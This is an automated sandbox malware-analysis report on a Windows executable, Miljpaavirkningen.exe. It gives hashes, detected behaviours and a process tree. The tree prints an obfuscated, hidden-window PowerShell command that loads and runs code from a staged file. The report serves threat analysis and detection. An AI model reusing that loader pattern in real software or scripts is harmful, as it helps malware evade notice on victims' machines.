Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22-10-2024 16:08
Static task
static1
Behavioral task
behavioral1
Sample
Miljpaavirkningen.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Miljpaavirkningen.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Kreditnotaens/Plettes.ps1
Resource
win7-20240729-en
Behavioral task
behavioral4
Sample
Kreditnotaens/Plettes.ps1
Resource
win10v2004-20241007-en
General
-
Target
Miljpaavirkningen.exe
-
Size
895KB
-
MD5
0327d3ca2373bdcfad29ae18a7554884
-
SHA1
92ce0598c98f0ddc2ae136491f0e988ddcf29d49
-
SHA256
eb60de90ee98dcc76c344d75d96f2eb72bd4466a504f2668a660ec928abf07e1
-
SHA512
efdd810fab7b956116a99ba2d78e723474e14343c8cd5cde01ae8cb61a441aad14f516a151c530b42b7b8b1760405ca87c9415cbf53a541190c92e2250c751ee
-
SSDEEP
12288:N5e/L/ujA9jjzAmiTs3QCXDzo3vKz/oByv268ODurlKRFP7Pytafm6wY8yujWX6d:abu0wmt43w/9268OD6lm7Pytae6/B1G5
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 1784 powershell.exe 2348 powershell.exe -
Drops file in Windows directory 4 IoCs
Processes:
Miljpaavirkningen.exedescription ioc process File opened for modification C:\Windows\resources\Nebengeschfter.ini Miljpaavirkningen.exe File opened for modification C:\Windows\resources\0409\gildes.lak Miljpaavirkningen.exe File opened for modification C:\Windows\Fonts\thyrididae.ini Miljpaavirkningen.exe File opened for modification C:\Windows\resources\0409\diaspidine.Inq Miljpaavirkningen.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Miljpaavirkningen.exepowershell.exepowershell.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Miljpaavirkningen.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 1784 powershell.exe 2348 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1784 powershell.exe Token: SeDebugPrivilege 2348 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
Miljpaavirkningen.exedescription pid process target process PID 2440 wrote to memory of 1784 2440 Miljpaavirkningen.exe powershell.exe PID 2440 wrote to memory of 1784 2440 Miljpaavirkningen.exe powershell.exe PID 2440 wrote to memory of 1784 2440 Miljpaavirkningen.exe powershell.exe PID 2440 wrote to memory of 1784 2440 Miljpaavirkningen.exe powershell.exe PID 2440 wrote to memory of 2348 2440 Miljpaavirkningen.exe powershell.exe PID 2440 wrote to memory of 2348 2440 Miljpaavirkningen.exe powershell.exe PID 2440 wrote to memory of 2348 2440 Miljpaavirkningen.exe powershell.exe PID 2440 wrote to memory of 2348 2440 Miljpaavirkningen.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Miljpaavirkningen.exe"C:\Users\Admin\AppData\Local\Temp\Miljpaavirkningen.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Rustling=Get-Content -raw 'C:\Users\Admin\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Kreditnotaens\Plettes.For';$Wheeping171=$Rustling.SubString(53402,3);.$Wheeping171($Rustling)"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Rustling=Get-Content -raw 'C:\Users\Admin\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Kreditnotaens\Plettes.For';$Wheeping171=$Rustling.SubString(53402,3);.$Wheeping171($Rustling)"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2348
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
803B
MD547027ef7e3a1709e131ffb08a50b6be2
SHA11516a214287a748dd3e02d73d8373a0baeddf352
SHA2564997726a61b3c10d6a7ed878463f680007b13dcd9533aa310b28888967d17d32
SHA51290d60995db3dca664f59a3780e7b141bc66fee80034d0372e2e8e90baf6acbc6ed8ca6da25e8d937a24b4aec057c260762fd351e4dd73f1a7aa179a4d87298ff
-
Filesize
849B
MD568f169ee1b757b8cb3fd66b93b245af7
SHA179eca9a98803d71953c27c6a6768283ee4fc632e
SHA2566a308dc4a480f127088ad672a858e09d50d64e63af14078136a80ba62c3dab69
SHA5123655c18733e86e6011b7b33c24a4ce816d16197d958a4906790b2d94e979730c50a2f4d17a0037ccf0ed828cd403cb144eb913d80376355ded94752b43561d23
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD55332cfad5e06f4af65d0cccf541224cf
SHA1acaa9c5e63e880690fb03979b3a2e152db600a55
SHA256b515fe43377ba9c68edf2f6ad21d150d7f5561fbdc23bd0bb634076243a8283f
SHA51255c220f2e86dd69fbe12aaef80a86d9aa44564d1d6d41f040b3944ba73abdbc57f27b09f0c2b84ead6690db15977f14b3b95135ddca1ed3aac45812c23525dde
-
Filesize
32B
MD553898e643bd3e0ca22a462325ad62da4
SHA1e0f08a75fa5219f39e49c1b9f361119905da7d02
SHA256b947991000aea669ebfeadfb12de45121d46ad3dfd02296f373f9bf8ce4f1aff
SHA512aa17b99a93a04f7bbbb92f34c15921da80e20592a39b3921f1d3cc59fae55f66196b2be4f56716846daff041253cb63d7e373b84234d451181c87f1d097fe8ca